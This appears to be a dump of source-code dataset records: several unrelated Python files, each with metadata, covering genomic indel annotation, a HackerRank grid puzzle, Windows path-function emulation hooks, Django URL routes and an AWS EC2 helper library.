    if len(df) == 0:
        # BUGFIX: use the module-level logger instead of the root logger
        # (the original called logging.warning, leaving `logger` unused).
        logger.warning("No indels annotated in coding region. Analysis done.")
        sys.exit(0)

    # gene symbols
    df["gene_symbol"] = df.apply(get_gene_symbol, axis=1)

    # formats the header
    df = df[
        [
            "chr",
            "pos",
            "ref",
            "alt",
            "rescued",
            "indel_seq",
            "annotation",
            "gene_symbol",
            "is_ins",
        ]
    ]

    return df


def is_insertion(row):
    """Encode whether the indel is an insertion or a deletion.

    Args:
        row (pandas.Series): reference seq (str) at index 'ref'
    Returns:
        is_insertion (int): 1 if insertion ('ref' is '-'), 0 if deletion.
            DOCFIX: the original docstring stated the opposite encoding;
            the code and downstream consumers (idl_type == 1 branches in
            generate_coding_indels) treat 1 as insertion.
    """
    return 1 if row["ref"] == "-" else 0


def get_indel_seq(row):
    """Gets indel sequence

    Args:
        row (pandas.Series): a Series with 'ref' and 'alt' indices
    Returns:
        indel_seq (str): inserted sequence when 'ref' is '-',
            otherwise the deleted sequence
    """
    return row["alt"] if row["ref"] == "-" else row["ref"]


def annotate_indels(row, exon_data, fasta, chr_prefixed, postprocess=False):
    """Annotates indels for all RefSeq isoforms

    Args:
        row (pandas.Series): a Series with indices 'chr', 'pos',
            'is_ins', 'indel_seq'
        exon_data (pysam.TabixFile): coding exon database
        fasta (str): path to fasta file
        chr_prefixed (bool): True if chromosome names in BAM are "chr"-prefixed
        postprocess (bool): True if used in indel_postprocessor.
            Default to False
    Returns:
        annotation (str): comma-joined tokens, one per isoform, formatted:
            GeneSymbol|RefSeqAccession|CodonPosition|Effect|IsInsensitive
            (the IsInsensitive field is omitted when postprocess=True);
            '-' for non-coding indels
    """
    chrom = row["chr"]
    pos = row["pos"]
    idl_type = row["is_ins"]
    idl_seq = row["indel_seq"]

    # generates CodingSequenceWithIndel instances
    idls = generate_coding_indels(
        chrom, pos, idl_type, idl_seq, exon_data, fasta, chr_prefixed
    )

    # annotates for all RefSeq isoforms
    annots = []
    for idl in idls:
        codon_pos, effect = idl.effect()
        is_insensitive = idl.is_nmd_insensitive()
        fields = [idl.gene_symbol, idl.accession, str(codon_pos), effect]
        if not postprocess:
            fields.append(str(is_insensitive))
        annots.append("|".join(fields))

    return ",".join(annots) if annots else "-"


def _in_untranslated_region(strand, exon, last_exon, idl_type, pos, exon_start, exon_end):
    """Return True when the indel at `pos` falls in the 5' or 3' UTR
    of the exon record described by the remaining arguments.

    idl_type: 1 for insertion, 0 for deletion. Insertions touching the
    exon start (exon_start >= pos) are treated as UTR; deletions must be
    strictly upstream (exon_start > pos).
    """
    if strand == "+":
        # 5'UTR on positive strand
        if exon == 1 and (
            (idl_type == 1 and exon_start >= pos)
            or (idl_type == 0 and exon_start > pos)
        ):
            return True
        # 3'UTR on positive strand
        if exon == last_exon and pos > exon_end:
            return True
    elif strand == "-":
        # 5'UTR on negative strand
        if exon == 1 and pos > exon_end:
            return True
        # 3'UTR on negative strand
        if exon == last_exon and (
            (idl_type == 1 and exon_start >= pos)
            or (idl_type == 0 and exon_start > pos)
        ):
            return True
    return False


def generate_coding_indels(chr, pos, idl_type, idl_seq, exon_data, fasta, chr_prefixed):
    """Generates coding indel objects

    Args:
        chr (str): chr1-22, chrX or chrY. Note "chr"-prefixed.
            (parameter name shadows the builtin `chr`; kept for
            backward compatibility with keyword callers)
        pos (int): 1-based genomic position
        idl_type (int): 1 for insertion, 0 for deletion
        idl_seq (str): inserted or deleted sequence
        exon_data (pysam.TabixFile): coding exon database
        fasta (str): path to fasta file
        chr_prefixed (bool): True if chromosome names in BAM or FASTA
            are "chr"-prefixed
    Returns:
        coding_idl_lst (list): a list of CodingSequenceWithIndel obj
            empty list if non-coding indel
    """
    coding_idl_lst = []

    try:
        candidate_genes = exon_data.fetch(chr, pos - 11, pos + 11)
    except Exception:
        # BUGFIX: was a bare `except:`. pysam raises ValueError for
        # contigs absent from the tabix index; treat any fetch failure
        # as "no candidates" as before, but stop swallowing KeyboardInterrupt.
        candidate_genes = None

    if not candidate_genes:
        return coding_idl_lst

    for line in candidate_genes:
        lst = line.split("\t")

        # parsing exon info
        info = lst[3].split("|")
        exon, last_exon = int(info[2]), int(info[3])

        # exon start and end
        exon_start, exon_end = int(lst[1]), int(lst[2])

        # strand
        strand = lst[4]

        # check for UTR: skip records where the indel is non-coding
        if _in_untranslated_region(
            strand, exon, last_exon, idl_type, pos, exon_start, exon_end
        ):
            continue

        indel_in_reference_genome = curate_indel_in_genome(
            fasta, chr, pos, idl_type, idl_seq, chr_prefixed
        )
        lt_seq = indel_in_reference_genome.lt_seq
        rt_seq = indel_in_reference_genome.rt_seq

        accession = info[0]
        gene_symbol = info[1]
        cds_start = int(info[4])

        prev_exon = lst[5].split("|")
        prev_exon_start, prev_exon_end = int(prev_exon[0]), int(prev_exon[1])
        next_exon = lst[6].split("|")
        next_exon_start, next_exon_end = int(next_exon[0]), int(next_exon[1])

        indel = CodingSequenceWithIndel(
            chr,
            pos,
            idl_type,
            lt_seq,
            idl_seq,
            rt_seq,
            strand,
            accession,
            gene_symbol,
            exon,
            exon_start,
            exon_end,
            last_exon,
            cds_start,
            prev_exon_start,
            prev_exon_end,
            next_exon_start,
            next_exon_end,
        )
        coding_idl_lst.append(indel)

    return coding_idl_lst


def get_gene_symbol(row):
    """Extracts gene name from annotation

    Args:
        row (pandas.Series): annotation info (str) at 'annotation' index
    Returns:
        gene_symbol (str): comma-joined unique gene name(s).
            NOTE: ordering follows set iteration order, so it is not
            guaranteed stable across runs.
    """
    # Global side effect preserved from the original: silences pandas
    # SettingWithCopyWarning for downstream assignments.
    pd.options.mode.chained_assignment = None
    tokens = row["annotation"].split(",")
    genes = {token.split("|")[0] for token in tokens}
    return ",".join(genes)
30.145763
88
0.534353
1,002
8,893
4.576846
0.220559
0.028783
0.017008
0.018535
0.257959
0.209769
0.152638
0.127344
0.1099
0.07283
0
0.009728
0.375801
8,893
294
89
30.248299
0.816429
0.342179
0
0.151899
0
0
0.040022
0
0
0
0
0
0
1
0.037975
false
0.037975
0.044304
0
0.120253
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99db77b0d0571155bd78aac43f3d762eb5c8d3d3
1,494
py
Python
problem_solving/python/algorithms/implementation/cavity_map.py
kcc3/hackerrank-solutions
f862b44b840bd447d99dc148f6bb5e2f5bfb8a86
[ "MIT" ]
null
null
null
problem_solving/python/algorithms/implementation/cavity_map.py
kcc3/hackerrank-solutions
f862b44b840bd447d99dc148f6bb5e2f5bfb8a86
[ "MIT" ]
null
null
null
problem_solving/python/algorithms/implementation/cavity_map.py
kcc3/hackerrank-solutions
f862b44b840bd447d99dc148f6bb5e2f5bfb8a86
[ "MIT" ]
1
2020-06-04T09:23:19.000Z
2020-06-04T09:23:19.000Z
def cavity_map(grid):
    """Hackerrank Problem: https://www.hackerrank.com/challenges/cavity-map/problem

    You are given a square map as a matrix of integer strings. Each cell of the map has a value denoting its depth.
    We will call a cell of the map a cavity if and only if this cell is not on the border of the map and each cell
    adjacent to it has strictly smaller depth. Two cells are adjacent if they have a common side, or edge.

    Find all the cavities on the map and replace their depths with the uppercase character X.

    For example, given a matrix:

    989
    191
    111

    You should return:

    989
    1X1
    111

    The center cell was deeper than those on its edges: [8,1,1,1]. The deep cells in the top two corners don't share
    an edge with the center cell.

    BUGFIXES over the original:
      - `xrange` / `print` statement (Python 2 only) replaced with Python 3 forms.
      - the original aliased `output_grid = grid` and mutated the caller's
        list in place; a shallow copy now keeps the input intact.
        (Comparisons are unaffected: 'X' sorts above every digit, so a
        replaced neighbour could never re-qualify a cell.)

    Args:
        grid (list): a list of strings denoting the depths of the teeth

    Returns:
        list: a list of strings with X's in the place where there are cavities
    """
    n = len(grid)
    output_grid = list(grid)  # shallow copy; rows are immutable strings
    # Only interior cells can be cavities; depths are single digit chars,
    # so lexicographic comparison equals numeric comparison.
    for i in range(1, n - 1):
        for j in range(1, n - 1):
            depth = grid[i][j]
            if (depth > grid[i + 1][j] and depth > grid[i - 1][j]
                    and depth > grid[i][j + 1] and depth > grid[i][j - 1]):
                output_grid[i] = output_grid[i][:j] + "X" + output_grid[i][j + 1:]
    return output_grid


if __name__ == "__main__":
    map = ["1112", "1912", "1892", "1234"]
    print(cavity_map(map))
33.954545
119
0.615127
259
1,494
3.490347
0.416988
0.060841
0.053097
0.044248
0.108407
0.068584
0.057522
0
0
0
0
0.043192
0.287149
1,494
44
120
33.954545
0.805634
0
0
0
0
0
0.046468
0
0
0
0
0
0
0
null
null
0
0
null
null
0.076923
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
99dd827cc75c97313b16be59de14d6bad416a8e2
1,242
py
Python
rugosa/emulation/call_hooks/win_api/shlwapi.py
Defense-Cyber-Crime-Center/rugosa
70f5b1db7e3f02ecccb0495fe1c0c77930769276
[ "MIT" ]
1
2022-03-13T03:03:31.000Z
2022-03-13T03:03:31.000Z
rugosa/emulation/call_hooks/win_api/shlwapi.py
Defense-Cyber-Crime-Center/rugosa
70f5b1db7e3f02ecccb0495fe1c0c77930769276
[ "MIT" ]
null
null
null
rugosa/emulation/call_hooks/win_api/shlwapi.py
Defense-Cyber-Crime-Center/rugosa
70f5b1db7e3f02ecccb0495fe1c0c77930769276
[ "MIT" ]
null
null
null
""" Functions found in shlwapi.dll Shell Lightweight Utility Functions """ import logging import ntpath from ...call_hooks import builtin_func logger = logging.getLogger(__name__) @builtin_func("PathAppendA") @builtin_func("PathAppendW") #typedef(BOOL PathAppendA(LPSTR pszPath,LPCSTR pszMore);) def pathappend(cpu_context, func_name, func_args): """ Appends one path to the end of another """ wide = func_name.endswith(u"W") path_ptr, more_ptr = func_args curr_path = cpu_context.memory.read_string(path_ptr, wide=wide) more_path = cpu_context.memory.read_string(more_ptr, wide=wide) full_path = ntpath.join(curr_path, more_path) cpu_context.memory.write_string(path_ptr, full_path, wide=wide) return True @builtin_func("PathAddBackslashA") @builtin_func("PathAddBackslashW") #typedef(LPWSTR PathAddBackslashW(LPWSTR pszPath));) def pathaddbackslash(cpu_context, func_name, func_args): """ Appends a backslash to the path """ wide = func_name.endswith(u"W") path_ptr = func_args[0] curr_path = cpu_context.memory.read_string(path_ptr, wide=wide) full_path = curr_path + "\\" cpu_context.memory.write_string(path_ptr, full_path, wide=wide) return True
25.346939
67
0.738325
171
1,242
5.081871
0.362573
0.080552
0.080552
0.115075
0.482163
0.437284
0.402762
0.326812
0.260069
0.260069
0
0.000952
0.154589
1,242
48
68
25.875
0.826667
0.198873
0
0.347826
0
0
0.062827
0
0
0
0
0
0
1
0.086957
false
0
0.130435
0
0.304348
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99ddb51556072c9fe39d711ea4b8ad9ad506d836
1,057
py
Python
massage/urls.py
Johncs2d/accounting-system
46d660044b198afadbf6f90b72376f6a69166c5f
[ "MIT" ]
null
null
null
massage/urls.py
Johncs2d/accounting-system
46d660044b198afadbf6f90b72376f6a69166c5f
[ "MIT" ]
2
2021-03-19T00:39:18.000Z
2021-03-30T12:48:58.000Z
massage/urls.py
Johncs2d/accounting-system
46d660044b198afadbf6f90b72376f6a69166c5f
[ "MIT" ]
null
null
null
"""URL configuration for the massage app: maps each route to its view."""
from django.urls import path
from . import views

# NOTE(review): naming is inconsistent (snake_case vs camelCase view names,
# and the last entry's reverse name 'journalControls' breaks the pattern of
# matching the route). Left untouched because templates/redirects may
# reverse() these names -- confirm before renaming.
urlpatterns = [
    # Dashboard / informational pages
    path('', views.index, name='index'),
    path('info', views.info, name='info'),
    path('chart', views.charts, name='chart'),
    # Accounting reports
    path('trialbalance', views.trialbalance, name='trialbalance'),
    path('ledger', views.ledger, name='ledger'),
    path('balancesheet', views.balancesheet, name='balancesheet'),
    path('incomestatement', views.incomestatement, name='incomestatement'),
    path('journalize', views.journalize, name='journalize'),
    # Account / journal data entry
    path('sign_up/', views.sign_up, name='sign_up'),
    path("insertaccount", views.insertaccount, name='insertaccount'),
    path("inserjournal", views.inserjournal, name='inserjournal'),
    # Authentication
    path("register", views.signupform, name='register'),
    path("login", views.loginForm, name='login'),
    path("logout", views.logusout, name='logout'),
    path("log_in", views.log_me_in, name='log_in'),
    # Journal listing and controls
    path("journal_list", views.journalList, name='journal_list'),
    path("journal_control",views.journalControls,name='journalControls')
]
48.045455
75
0.69631
120
1,057
6.05
0.291667
0.024793
0
0
0
0
0
0
0
0
0
0
0.122044
1,057
22
76
48.045455
0.782328
0
0
0
0
0
0.285444
0
0
0
0
0
0
1
0
false
0
0.095238
0
0.095238
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99dffa459bc7dfffb6f4a430b3ffac5f8cc05734
194
py
Python
smores/__init__.py
codylandry/Smores
cc0717b5edd0c09982820cc8705f73119641d0a2
[ "MIT" ]
7
2017-09-18T13:04:30.000Z
2021-06-03T06:48:26.000Z
smores/__init__.py
codylandry/Smores
cc0717b5edd0c09982820cc8705f73119641d0a2
[ "MIT" ]
1
2017-11-22T20:45:27.000Z
2017-11-22T20:45:27.000Z
smores/__init__.py
codylandry/Smores
cc0717b5edd0c09982820cc8705f73119641d0a2
[ "MIT" ]
null
null
null
from .smores import Smores, AutocompleteResponse, TemplateString, TemplateFile, Schema, Nested

# Explicit public API of the smores package: re-export the core classes so
# `from smores import *` exposes exactly these names.
__all__ = [
    'Smores',
    'AutocompleteResponse',
    'TemplateString',
    'TemplateFile',
    'Schema',
    'Nested',
]
64.666667
98
0.778351
16
194
9.1875
0.5625
0.353742
0.544218
0.707483
0.870748
0.870748
0
0
0
0
0
0
0.087629
194
2
99
97
0.830508
0
0
0
0
0
0.329897
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
1
1
1
1
1
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
8
99e0f1004b2ba5a8602f4459d12c69e706b39a07
23,795
py
Python
opslib/icsec2.py
movermeyer/opslib
157be1342cf24297ef6b79cbe320207e610c9c81
[ "Apache-2.0" ]
1
2015-06-10T17:47:56.000Z
2015-06-10T17:47:56.000Z
opslib/icsec2.py
movermeyer/opslib
157be1342cf24297ef6b79cbe320207e610c9c81
[ "Apache-2.0" ]
null
null
null
opslib/icsec2.py
movermeyer/opslib
157be1342cf24297ef6b79cbe320207e610c9c81
[ "Apache-2.0" ]
2
2016-02-29T23:48:57.000Z
2018-03-05T17:26:35.000Z
""" IcsEc2: Library for EC2 ----------------------- +--------------------+------------+--+ | This is the IcsEc2 common library. | +--------------------+------------+--+ """ from operator import attrgetter from time import time, mktime, sleep, gmtime, strftime, strptime from boto.ec2 import get_region from boto.ec2.connection import EC2Connection from boto.vpc import connect_to_region as vpc_connect_to_region from opslib.icsexception import IcsEc2Exception import logging log = logging.getLogger(__name__) class IcsEc2(EC2Connection): """ ICS Library for EC2 """ def __init__(self, region, **kwargs): super(IcsEc2, self).__init__( region=get_region(region), **kwargs) def get_instance_attribute(self, instance_id, attr_name): """ Get the attribute value of an instance. :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :type attr_name: string :param attr_name: the name of the instance attribute, details shown as below: :ivar id: The unique ID of the Instance. :ivar groups: A list of Group objects representing the security groups associated with the instance. :ivar public_dns_name: The public dns name of the instance. :ivar private_dns_name: The private dns name of the instance. :ivar state: The string representation of the instance's current state. :ivar state_code: An integer representation of the instance's current state. :ivar previous_state: The string representation of the instance's previous state. :ivar previous_state_code: An integer representation of the instance's current state. :ivar key_name: The name of the SSH key associated with the instance. :ivar instance_type: The type of instance (e.g. m1.small). :ivar launch_time: The time the instance was launched. :ivar image_id: The ID of the AMI used to launch this instance. :ivar placement: The availability zone in which the instance is running. :ivar placement_group: The name of the placement group the instance is in (for cluster compute instances). 
:ivar placement_tenancy: The tenancy of the instance, if the instance is running within a VPC. An instance with a tenancy of dedicated runs on a single-tenant hardware. :ivar kernel: The kernel associated with the instance. :ivar ramdisk: The ramdisk associated with the instance. :ivar architecture: The architecture of the image (i386|x86_64). :ivar hypervisor: The hypervisor used. :ivar virtualization_type: The type of virtualization used. :ivar product_codes: A list of product codes associated with this instance. :ivar ami_launch_index: This instances position within it's launch group. :ivar monitored: A boolean indicating whether monitoring is enabled or not. :ivar monitoring_state: A string value that contains the actual value of the monitoring element returned by EC2. :ivar spot_instance_request_id: The ID of the spot instance request if this is a spot instance. :ivar subnet_id: The VPC Subnet ID, if running in VPC. :ivar vpc_id: The VPC ID, if running in VPC. :ivar private_ip_address: The private IP address of the instance. :ivar ip_address: The public IP address of the instance. :ivar platform: Platform of the instance (e.g. Windows) :ivar root_device_name: The name of the root device. :ivar root_device_type: The root device type (ebs|instance-store). :ivar block_device_mapping: The Block Device Mapping for the instance. :ivar state_reason: The reason for the most recent state transition. :ivar groups: List of security Groups associated with the instance. :ivar interfaces: List of Elastic Network Interfaces associated with this instance. :ivar ebs_optimized: Whether instance is using optimized EBS volumes or not. :ivar instance_profile: A Python dict containing the instance profile id and arn associated with this instance. 
""" if not isinstance(instance_id, basestring): raise IcsEc2Exception( "instance_id should be a 'str' not %s" % type(instance_id)) if not isinstance(attr_name, basestring): raise IcsEc2Exception( "attr_name should be a 'str' not %s" % type(attr_name)) resource = self.get_all_instances(instance_ids=instance_id)[0] instance = resource.instances[0] return attrgetter(attr_name)(instance) def get_public_address(self, instance_id): """ Get the public IPv4 address of the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: string :return: a string containing the public IPv4 address """ return self.get_instance_attribute(instance_id, "ip_address") def get_private_address(self, instance_id): """ Get the private IPv4 address of the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: string :return: a string containing the private IPv4 address """ return self.get_instance_attribute(instance_id, "private_ip_address") def get_public_dns(self, instance_id): """ Get the public dns address of the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: string :return: a string containing the public dns address """ return self.get_instance_attribute(instance_id, "public_dns_name") def get_private_dns(self, instance_id): """ Get the private dns address of the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: string :return: a string containing the private IPv4 address """ return self.get_instance_attribute(instance_id, "private_dns_name") def get_instance_tags(self, instance_id): """ Get tags of the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: dict :return: a dictionary containing the tags of this instance """ tags = self.get_all_tags(filters={"resource-id": instance_id}) ret = {} for tag in tags: ret.update({tag.name: tag.value}) return 
ret def add_instance_tags(self, instance_id, tags): """ Add tags to the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' """ return self.create_tags(instance_id, tags) def del_instance_tags(self, instance_id, tags): """ Remove tags of the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' """ return self.delete_tags(instance_id, tags) def get_eips_from_addr(self, eip_list): """ Get EIP objects via the list of EIP addresses :type eip_list: list :param eip_list: the list of EIP addresses :rtype: class :return: EIP objects in boto """ return self.get_all_addresses( filters={'public-ip': eip_list}) def get_eips_from_instance(self, instance_id): """ Get EIP objects via the instance id :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: class :return: EIP objects in boto """ return self.get_all_addresses( filters={'instance-id': instance_id}) def get_instance_event(self, instance_id): """ Get the event of the specified instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' """ result = self.get_all_instance_status( instance_ids=instance_id) return result[0].events def get_instance_status(self, instance_id): """ Get the instance status and system status of the specified instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: tuple :return: a tuple contains (instance_status, system_status) """ inst_status = self.get_all_instance_status( instance_ids=instance_id) return (inst_status[0].instance_status.status, inst_status[0].system_status.status) def is_instance_healthy(self, instance_id): """ check the health of the specified instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: boolean :return: True/False """ result = self.get_instance_status(instance_id) if result[0].lower() == "ok" and result[1].lower() == "ok": return 
True else: return False def is_eip_free(self, eip): """ check the availability of the specified EIP address: free or not :type eip: string :param eip: one EIP address :rtype: tuple :return: (True/False, EIP object/None) """ eip_ops = self.get_eips_from_addr(eip) if not eip_ops: return (False, None) eip_op = eip_ops[0] if eip_op.public_ip != eip: raise IcsEc2Exception( "the real eip address %s is not equal to the expected one %s" % (eip_op.public_ip, eip)) if eip_op.instance_id: return (False, eip_op) else: return (True, eip_op) def bind_eip(self, eip, instance_id): """ Bind EIP address to the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: bool :return: success or raise IcsEc2Exception """ if isinstance(eip, list): raise IcsEc2Exception( "cannot associate multiple eips '%s' to one instance '%s'" % (eip, instance_id)) result, eipop = self.is_eip_free(eip) if result: log.info("the eip address " + "'%s' will be associated " % eip + "with this instance '%s'" % instance_id) if eipop.domain == "vpc": self.associate_address( instance_id=instance_id, allocation_id=eipop.allocation_id) else: eipop.associate(instance_id=instance_id) elif eipop.instance_id != instance_id: log.warning( "this eip '%s' has been associated with another '%s'" % (eip, eipop.instance_id)) return False else: log.info("the eip address " + "'%s' has been associated " % eip + "with this instance '%s'" % instance_id) return True result, eipop = self.is_eip_free(eip) return not result and eipop.instance_id == instance_id def free_eip(self, eip, instance_id): """ Free EIP address to the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: bool :return: success or raise IcsEc2Exception """ if isinstance(eip, list): raise IcsEc2Exception( "cannot free multiple eips '%s' to one instance '%s'" % (eip, instance_id)) result, eipop = self.is_eip_free(eip) if result: log.warning("this eip '%s' is not associated 
with '%s'" % (eip, instance_id)) return True elif eipop.instance_id != instance_id: log.warning( "this eip '%s' has been associated with another '%s'" % (eip, eipop.instance_id)) return True log.info("the eip address " + "'%s' will be disassociated with this instance '%s'" % (eip, instance_id)) eipop.disassociate() return self.is_eip_free(eip)[0] def get_volumes_by_instance(self, instance_id, device_name=None): """ Get boto Volume Objects by instance Id or device name :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :type device_name: string :param device_name: device name like '/dev/sdf' :rtype: list :return: list of boto volume objects """ if device_name is None: filters = {'attachment.instance-id': instance_id} else: filters = {'attachment.instance-id': instance_id, 'attachment.device': device_name} return self.get_all_volumes(filters=filters) def take_snapshot(self, volume_id, description=None, tags=None): """ Take a snapshot to existing volume with specific tags :type volume_id: string :param volume_id: EC2 volume id startwith 'vol-xxxxxxx' :type description: string :param description: words to describe the usage of this snapshot :type tags: dict :param tags: snapshot tags like {'Name': 'XXX'} :rtype: class :return: boto snapshot object """ if tags is None: tags = {} snapshot = self.create_snapshot(volume_id, description) tags.update({'VolumeId': volume_id}) timestamp = strftime("%Y%m%d-%H%M", gmtime()) tags.update({'Timestamp': timestamp}) for name, value in tags.iteritems(): if not name.startswith('tag:'): name = name.replace('_', '-') else: name = name.replace('tag:', '') snapshot.add_tag(name, value) return snapshot @staticmethod def format_tags(tags): """ Convert {"Name": "XXX"} to {"tag:Name": "XXX"} """ new_tags = {} for name, value in tags.iteritems(): if not name.startswith('tag:'): name = 'tag:'.join(["", name]) new_tags[name] = value return new_tags def find_snapshot_by_tags(self, tags): """ Find a snapshot by 
specific tags :type tags: dict :param tags: snapshot tags like {'Name': 'XXX'} :rtype: list :return: list of boto snapshot objects """ tags = self.format_tags(tags) # FIXME: only used for Cassandra if 'tag:Timestamp' in tags and tags['tag:Timestamp'] == '0': refined_tags = {} refined_tags['tag:Role'] = tags['tag:Role'] refined_tags['tag:Timestamp'] = tags['tag:Timestamp'] tags = refined_tags if 'tag:Timestamp' in tags and \ tags['tag:Timestamp'].lower() == 'latest': tags.pop('tag:Timestamp') snapshots = self.get_all_snapshots(filters=self.format_tags(tags)) if snapshots: return self.fetch_latest_snapshot(snapshots) else: return None return self.get_all_snapshots(filters=self.format_tags(tags)) def fetch_latest_snapshot(self, snapshots): """ Find the latest Snapshot """ timestamps = [snapshot.tags['Timestamp'] for snapshot in snapshots] return snapshots[timestamps.index(max(timestamps))] def fetch_snapid_by_tags(self, **tags): """ Find the Snapshot Id by specific tags :type tags: dict :param tags: snapshot tags like {'Name': 'XXX'} :rtype: string :return: Snapshot Id """ # FIXME: if tag:Timestamp == latest, then flag = True flag = False tags = self.format_tags(tags) # FIXME: hard-coded string in tags if 'tag:Timestamp' in tags and \ tags['tag:Timestamp'].lower() == 'latest': del tags['tag:Timestamp'] flag = True snapshots = self.find_snapshot_by_tags(tags) if not snapshots: return None elif len(snapshots) > 1: # FIXME: hard-coded string in tags if not flag: return None snapshot = self.fetch_latest_snapshot(snapshots) if not snapshot: return None else: return snapshot.id else: return snapshots[0].id def clean_snapshots(self, tags, duration): """ Clean up snapshots by specific tags and duration :type tags: dict :param tags: snapshot tags like .. 
code-block:: javascript { "Name": "XXX" } :type duration: int :param duration: seconds :rtype: list :return: list of cleaned snapshot ids """ snapshots = self.find_snapshot_by_tags(self.format_tags(tags)) deleted_ids = [] for snapshot in snapshots: if 'Timestamp' in snapshot.tags: try: tmp_time = strptime(snapshot.tags[ 'Timestamp'], "%Y%m%d-%H%M") timestamp = mktime(tmp_time) except Exception, e: log.error(e) continue now = mktime(gmtime()) if now - timestamp > duration: deleted_ids.append(snapshot.id) self.del_snapshot(snapshot.id) return deleted_ids def del_snapshot(self, snapshot_id): """ Delete snapshots by snapshot_id :type snapshot_id: string :param snapshot_id: snapshot Id like 'snap-xxxxxx' :rtype: boolean :return: true, false, exception """ return self.delete_snapshot(snapshot_id) def find_ami_by_tags(self, tags): """ Find AMI by specific tags :type tags: dict :param tags: AMI tags like {'Name': 'XXX'} :rtype: list :return: list of boto image objects """ return self.get_all_images(filters=self.format_tags(tags)) def fetch_imageid_by_tags(self, **tags): """ Fetch the Image Id by specific tags :type tags: dict :param tags: AMI tags like {'Name': 'XXX'} :rtype: string :return: Image Id """ images = self.find_ami_by_tags(self.format_tags(tags)) if not images: return None elif len(images) > 1: return None else: return images[0].id def get_all_zones(self, zones=None): """ Get all Availability Zones under this region :type zones: list :param zones: specified zone list :rtype: list :return: list of availability zones in this region """ if zones is not None and isinstance(zones, list): return zones else: return [zone.name for zone in super(IcsEc2, self).get_all_zones()] def size_of_all_zones(self, zones=None): """ Get the number of all Availability Zones under this region :type zones: list :param zones: specified zone list :rtype: int :return: number of availability zones in this region """ zone_list = self.get_all_zones(zones) if zone_list: return len(zone_list) 
else: return 0 def get_sgroup(self, name, vpc_id=None): """ Get Security Group Name (if Ec2) / Id (if Vpc) :param name: security group name :type name: string :param vpc_id: vpc id :type vpc_id: string :rtype: string :return: security group id """ if vpc_id is None: return name else: filters = {'vpc-id': vpc_id, 'group-name': name} group = self.get_all_security_groups(filters=filters) if group and isinstance(group, list): return group[0].id else: return None def get_security_group_id(self, name, vpc_id=None): """ Get security group id :param name: security group name :type name: string :param vpc_id: vpc id :type vpc_id: string :rtype: string :return: security group id """ if vpc_id: filters = {'vpc-id': vpc_id, 'group-name': name} else: filters = {'group-name': name} group = self.get_all_security_groups(filters=filters) if group: return group[0].id else: return None def get_az_from_subnet_id(self, subnet_id=None, zones=None): """ Get the name of Availability Zone by its Subnet Id :type zones: list :param zones: specified zone list :type subnet_id: string or comma-seperated list of string :param subnet_id: subnet id :rtype: list :return: a list of availability zone names """ if subnet_id is None: return self.get_all_zones(zones) vpc = vpc_connect_to_region(self.region.name) if isinstance(subnet_id, basestring): subnet_ids = subnet_id.lstrip().rstrip().split(",") else: return None zones = [] for sid in subnet_ids: subnets = vpc.get_all_subnets(sid) if subnets and isinstance(subnets, list): zones.append(subnets[0].availability_zone) return zones def get_zone_name_for_cassandra(self, index, zones=None): """ Get the name of Availability Zone for Cassandra :type zones: list :param zones: specified zone list :type index: int :param index: the index of cassandra instance :rtype: string :return: zone name like "us-west-2a" """ zone_list = self.get_all_zones(zones) zone_size = self.size_of_all_zones(zones) return zone_list[(int(index) - 1) % zone_size] def 
get_zone_index_for_cassandra(self, index, zones=None): """ Get the index of Availability Zone for Cassandra :type zones: list :param zones: specified zone list :type index: int :param index: the index of cassandra instance :rtype: string :return: zone index like "1" """ zone_size = self.size_of_all_zones(zones) return str((int(index) - 1) / zone_size + 1) def get_zone_suffix_for_cassandra(self, index, zones=None): """ Get the suffix of Availability Zone for Cassandra :type zones: list :param zones: specified zone list :type index: int :param index: the index of cassandra instance :rtype: string :return: zone suffix like "a-1" """ return "-".join([self.get_zone_name_for_cassandra(index, zones)[-1], self.get_zone_index_for_cassandra(index, zones)]) # vim: tabstop=4 shiftwidth=4 softtabstop=4
32.155405
79
0.586005
2,863
23,795
4.725463
0.114565
0.074654
0.017296
0.022175
0.507798
0.436396
0.38399
0.360041
0.317392
0.290191
0
0.004877
0.327884
23,795
739
80
32.198917
0.841055
0.007985
0
0.322464
0
0
0.083786
0.003625
0
0
0
0.002706
0
0
null
null
0
0.025362
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
99e153d1e909e07a485231b3678975bc8a52fb3d
540
py
Python
CS-190/Labs/Lab6.py
lividsubset3/College-CS
6f1eb6b10e43a37654335331758677c797034961
